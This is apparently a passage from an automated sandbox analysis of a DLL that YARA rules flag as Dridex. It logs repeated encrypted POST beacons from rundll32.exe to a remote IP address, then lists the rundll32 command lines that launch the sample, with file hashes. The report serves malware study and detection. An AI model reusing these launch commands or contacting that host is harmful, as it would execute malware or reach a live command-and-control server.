2021-10-28 02:47:38 UTC | 377 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:38 UTC | 382 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:38 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
77 | 192.168.2.5 | 50110 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:39 UTC | 382 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:39 UTC | 382 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:40 UTC | 387 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:40 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
78 | 192.168.2.5 | 50114 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:41 UTC | 387 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:41 UTC | 387 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:42 UTC | 392 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:42 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
79 | 192.168.2.5 | 50118 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:43 UTC | 392 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:43 UTC | 392 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:44 UTC | 397 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:44 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.5 | 49785 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:45:20 UTC | 39 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:45:20 UTC | 39 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:45:21 UTC | 44 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:45:21 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
80 | 192.168.2.5 | 50122 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:45 UTC | 397 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:45 UTC | 397 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:46 UTC | 402 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:46 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
81 | 192.168.2.5 | 50126 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:47 UTC | 402 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:47 UTC | 402 | OUT | Data Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:48 UTC | 407 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:48 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
82 | 192.168.2.5 | 50130 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:47:50 UTC | 407 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:47:50 UTC | 407 | OUT | Data Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:47:51 UTC | 412 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:47:51 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        83192.168.2.550134192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:52 UTC412OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
Timestamp: 2021-10-28 02:47:52 UTC, kBytes transferred: 412, Direction: OUT
Data Raw: (binary POST body; hex dump and ASCII rendering omitted)
Timestamp: 2021-10-28 02:47:53 UTC, kBytes transferred: 417, Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:53 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 84
Source IP: 192.168.2.5
Source Port: 50138
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 02:47:54 UTC, kBytes transferred: 417, Direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 02:47:54 UTC, kBytes transferred: 417, Direction: OUT
Data Raw: (binary POST body; hex dump and ASCII rendering omitted)
Timestamp: 2021-10-28 02:47:55 UTC, kBytes transferred: 422, Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:55 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 85
Source IP: 192.168.2.5
Source Port: 50142
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 02:47:56 UTC, kBytes transferred: 422, Direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 02:47:56 UTC, kBytes transferred: 422, Direction: OUT
Data Raw: (binary POST body; hex dump and ASCII rendering omitted)
Timestamp: 2021-10-28 02:47:57 UTC, kBytes transferred: 427, Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:57 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 86
Source IP: 192.168.2.5
Source Port: 50146
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 02:47:58 UTC, kBytes transferred: 427, Direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 02:47:58 UTC, kBytes transferred: 427, Direction: OUT
Data Raw: (binary POST body; hex dump and ASCII rendering omitted)
Timestamp: 2021-10-28 02:47:59 UTC, kBytes transferred: 432, Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:47:59 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 87
Source IP: 192.168.2.5
Source Port: 50150
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 02:48:00 UTC, kBytes transferred: 432, Direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 02:48:00 UTC, kBytes transferred: 432, Direction: OUT
Data Raw: (binary POST body; hex dump and ASCII rendering omitted)
Timestamp: 2021-10-28 02:48:01 UTC, kBytes transferred: 437, Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:48:01 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID: 9
Source IP: 192.168.2.5
Source Port: 49792
Destination IP: 192.46.210.220
Destination Port: 443
Process: C:\Windows\SysWOW64\rundll32.exe

Timestamp: 2021-10-28 02:45:24 UTC, kBytes transferred: 44, Direction: OUT
POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
Timestamp: 2021-10-28 02:45:24 UTC, kBytes transferred: 44, Direction: OUT
Data Raw: (binary POST body; hex dump and ASCII rendering omitted)
Timestamp: 2021-10-28 02:45:24 UTC, kBytes transferred: 54, Direction: IN
HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:45:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 04:43:54
Start date: 28/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll'
Imagebase: 0x190000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.791906460.000000006ED31000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000003.390619959.0000000000820000.00000040.00000001.sdmp, Author: Joe Security
Reputation: moderate

General

Start time: 04:43:55
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
Imagebase: 0x150000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 04:43:56
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Bluewing
Imagebase: 0x13b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000003.340472911.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 04:43:56
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll',#1
Imagebase: 0x13b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000003.341889397.00000000033E0000.00000040.00000010.sdmp, Author: Joe Security
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.815931183.000000006ED31000.00000020.00020000.sdmp, Author: Joe Security
Reputation: high

General

Start time: 04:44:00
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Earth
Imagebase: 0x13b0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000006.00000003.369249349.0000000001280000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 04:44:08
Start date: 28/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.4470.dll,Masterjust
Imagebase: 0x7ff797770000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000008.00000003.387507409.0000000000E30000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

Disassembly

Code Analysis
